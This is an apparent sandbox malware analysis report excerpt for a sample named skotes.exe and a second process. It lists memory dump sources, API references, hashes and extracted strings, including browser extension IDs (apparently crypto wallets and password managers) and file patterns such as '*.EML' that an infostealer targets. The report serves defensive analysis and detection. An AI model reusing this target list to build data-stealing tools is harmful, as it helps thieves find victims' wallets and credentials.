                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            • API String ID: 0-1793179972
                                                                                                                                            • Opcode ID: ad0ea75b0fb28ee4d5d4841e3510820482cffc0b67fd5fbc9f0d8ec457a3fb43
                                                                                                                                            • Instruction ID: 691b2e356fc8f8965d3701d8d25927c6ae6a2254cd6130abcff0f80d05121d7a
                                                                                                                                            • Opcode Fuzzy Hash: ad0ea75b0fb28ee4d5d4841e3510820482cffc0b67fd5fbc9f0d8ec457a3fb43
                                                                                                                                            • Instruction Fuzzy Hash: 43218E7164420DAF9B30EFB5CD80E7B77ADAF003647108614FA2896162EBB1ED1086A0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00AF1764
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AF17AF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                            • String ID: pContext
                                                                                                                                            • API String ID: 3390424672-2046700901
                                                                                                                                            • Opcode ID: 31de4476d966f59a7ed400e818b78320befe43897931cff9e25d1c181c803a50
                                                                                                                                            • Instruction ID: ca115962b6e4085b0bdfffef26ddf971018f8874cb73b1f68f1ebffcae2b11e0
                                                                                                                                            • Opcode Fuzzy Hash: 31de4476d966f59a7ed400e818b78320befe43897931cff9e25d1c181c803a50
                                                                                                                                            • Instruction Fuzzy Hash: E9110636A00218DBCB15FF98C4849BD77A5AF84360B548065FE16A7352DB70ED41CFD0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00AEB94E
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AEB961
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                            • String ID: pContext
                                                                                                                                            • API String ID: 548886458-2046700901
                                                                                                                                            • Opcode ID: de4cca71cfcfe6f0ca2768d23cdce048d70cb1c0110478cf1f735b246d2e9022
                                                                                                                                            • Instruction ID: f4c122e841dadd8e3707df639aac9852bd871e6b7178830e1e9155320bd6fbaf
                                                                                                                                            • Opcode Fuzzy Hash: de4cca71cfcfe6f0ca2768d23cdce048d70cb1c0110478cf1f735b246d2e9022
                                                                                                                                            • Instruction Fuzzy Hash: FEE0D139B0010897CB04F7A5D959CDDB7BD9EC47207448155F611A3351DF70D945C5D0
                                                                                                                                            APIs
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE34FC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::invalid_argument::invalid_argument
                                                                                                                                            • String ID: pScheduler$version
                                                                                                                                            • API String ID: 2141394445-3154422776
                                                                                                                                            • Opcode ID: 8547242b8f55ee562852997d34ef4c790de75a35b7ee05c1d2b3c344a873eda0
                                                                                                                                            • Instruction ID: fa44d730f90f3d157e1715b1aa2e06d86b9b7527ed6072f97aa4370d7d005d6f
                                                                                                                                            • Opcode Fuzzy Hash: 8547242b8f55ee562852997d34ef4c790de75a35b7ee05c1d2b3c344a873eda0
                                                                                                                                            • Instruction Fuzzy Hash: 5CE08C3584024CB6CF26FB5AD84BADC77A89B1070AF94C162B911220E19BF497C8CA81
                                                                                                                                            Strings
                                                                                                                                            • fcfcfllfndlomdhbehjjcoimbgofdncg, xrefs: 00C91B8A
                                                                                                                                            • abogmiocnneedmmepnohnhlijcjpcifd, xrefs: 00C91B5A
                                                                                                                                            • cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00C91B0E, 00C91CCE
                                                                                                                                            • fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00C91B96
                                                                                                                                            • acmacodkjbdgmoleebolmdjonilkdbch, xrefs: 00C91D22
                                                                                                                                            • jgaaimajipbpdogpdglhaphldakikgef, xrefs: 00C91C32
                                                                                                                                            • aiifbnbfobpmeekipheeijimdpnlpgpp, xrefs: 00C91E06
                                                                                                                                            • nhnkbkgjikgcigadomkphalanndcapjk, xrefs: 00C91CE6
                                                                                                                                            • kncchdigobghenbbaddojjnnaogfppfj, xrefs: 00C91CFE
                                                                                                                                            • efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00C91CC3
                                                                                                                                            • nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00C91C93
                                                                                                                                            • aeblfdkhhhdcdjpifhhbdiojplfjncoa, xrefs: 00C91C62
                                                                                                                                            • amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00C91D8E
                                                                                                                                            • user.config, xrefs: 00C91B6E
                                                                                                                                            • aflkmfhebedbjioipglgcbcmnbpgliof, xrefs: 00C91DFA
                                                                                                                                            • bhghoamapcdpbohphigoooaddinpkbai, xrefs: 00C91E36
                                                                                                                                            • mnfifefkajgofkcjkemidiaecocnkjeh, xrefs: 00C91DBE
                                                                                                                                            • ejjladinnckdgjemekebdpeokbikhfci, xrefs: 00C91D3B
                                                                                                                                            • nngceckbapebfimnlniiiahkandclblb, xrefs: 00C91D6B
                                                                                                                                            • nanjmdknhkinifnkgdcggcfnhdaammmj, xrefs: 00C91B02
                                                                                                                                            • kppfdiipphfccemcignhifpjkapfbihd, xrefs: 00C91BC6
                                                                                                                                            • jnlgamecbpmbajjfhmmmlhejkemejdma, xrefs: 00C91B67
                                                                                                                                            • bcopgchhojmggmffilplmbdicgaihlkp, xrefs: 00C91E4E
                                                                                                                                            • dkdedlpgdmmkkfjabffeganieamfklkm, xrefs: 00C91DD6
                                                                                                                                            • jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 00C91B4E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000003.2605530053.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Offset: 00C85000, based on PE: false
                                                                                                                                            • Associated: 00000007.00000003.2568225666.0000000000C85000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_3_c85000_0tClIDb.2.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: abogmiocnneedmmepnohnhlijcjpcifd$acmacodkjbdgmoleebolmdjonilkdbch$aeblfdkhhhdcdjpifhhbdiojplfjncoa$aflkmfhebedbjioipglgcbcmnbpgliof$aiifbnbfobpmeekipheeijimdpnlpgpp$amkmjjmmflddogmhpjloimipbofnfjih$bcopgchhojmggmffilplmbdicgaihlkp$bhghoamapcdpbohphigoooaddinpkbai$cjelfplplebdjjenllpjcblmjkfcffne$dkdedlpgdmmkkfjabffeganieamfklkm$efbglgofoippbgcjepnhiblaibcnclgk$ejjladinnckdgjemekebdpeokbikhfci$fcfcfllfndlomdhbehjjcoimbgofdncg$fhbohimaelbohpjbbldcngcnapndodjp$jbdaocneiiinmjbjlgalhcelgbejmnid$jgaaimajipbpdogpdglhaphldakikgef$jnlgamecbpmbajjfhmmmlhejkemejdma$kncchdigobghenbbaddojjnnaogfppfj$kppfdiipphfccemcignhifpjkapfbihd$mnfifefkajgofkcjkemidiaecocnkjeh$nanjmdknhkinifnkgdcggcfnhdaammmj$nhnkbkgjikgcigadomkphalanndcapjk$nkbihfbeogaeaoehlefnkodbefgpgknn$nngceckbapebfimnlniiiahkandclblb$user.config
                                                                                                                                            • API String ID: 0-3309931341
                                                                                                                                            • Opcode ID: db890e31b948491473c2d8bc526832f7a78d97f7eae1d8d6c81c496bf84bc293
                                                                                                                                            • Instruction ID: bd77cd5af01435dc650ebd15b5f3051fcfda6f85a18bd1262a18c724f142feb3
                                                                                                                                            • Opcode Fuzzy Hash: db890e31b948491473c2d8bc526832f7a78d97f7eae1d8d6c81c496bf84bc293
                                                                                                                                            • Instruction Fuzzy Hash: 33D1DDAA80E3C25FD7038B345C7A6907FB09E13218B5E49DBC4D1CF1E3E258894AD766
                                                                                                                                            Strings
                                                                                                                                            • kncchdigobghenbbaddojjnnaogfppfj, xrefs: 00C9216A, 00C92174
                                                                                                                                            • Important Files/Profile/Music, xrefs: 00C922BA
                                                                                                                                            • hdokiejnpimakedhajhdlcegeplioahd, xrefs: 00C9227E
                                                                                                                                            • bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00C9212E
                                                                                                                                            • aeblfdkhhhdcdjpifhhbdiojplfjncoa, xrefs: 00C922A2, 00C922A3
                                                                                                                                            • amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00C921A6, 00C92234
                                                                                                                                            • ejbalbakoplchlghecdalmeeeajnimhm, xrefs: 00C922AE
                                                                                                                                            • fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00C9221E
                                                                                                                                            • cpojfbodiccabbabgimdeohkkpjfpbnf, xrefs: 00C92182
                                                                                                                                            • blnieiiffboillknjnepogjhkgnoapac, xrefs: 00C9213A
                                                                                                                                            • lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00C9210A
                                                                                                                                            • phkbamefinggmakgklpkljjmgibohnba, xrefs: 00C92117
                                                                                                                                            • jnlgamecbpmbajjfhmmmlhejkemejdma, xrefs: 00C9222A
                                                                                                                                            • lgmpcpglpngdoalbgeoldeajfclnhafa, xrefs: 00C92266
                                                                                                                                            • *.EML, xrefs: 00C9226E
                                                                                                                                            • acmacodkjbdgmoleebolmdjonilkdbch, xrefs: 00C9215E
                                                                                                                                            • fijngjgcjhjmmpcmkeiomlglpeiijkld, xrefs: 00C920E6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000003.2605530053.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Offset: 00C85000, based on PE: false
                                                                                                                                            • Associated: 00000007.00000003.2568225666.0000000000C85000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_3_c85000_0tClIDb.2.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: *.EML$Important Files/Profile/Music$acmacodkjbdgmoleebolmdjonilkdbch$aeblfdkhhhdcdjpifhhbdiojplfjncoa$amkmjjmmflddogmhpjloimipbofnfjih$bfnaelmomeimhlpmgjnjophhpkkoljpa$blnieiiffboillknjnepogjhkgnoapac$cpojfbodiccabbabgimdeohkkpjfpbnf$ejbalbakoplchlghecdalmeeeajnimhm$fijngjgcjhjmmpcmkeiomlglpeiijkld$fnjhmkhhmkbjkkabndcnnogagogbneec$hdokiejnpimakedhajhdlcegeplioahd$jnlgamecbpmbajjfhmmmlhejkemejdma$kncchdigobghenbbaddojjnnaogfppfj$lgmpcpglpngdoalbgeoldeajfclnhafa$lpfcbjknijpeeillifnkikgncikgfhdo$phkbamefinggmakgklpkljjmgibohnba
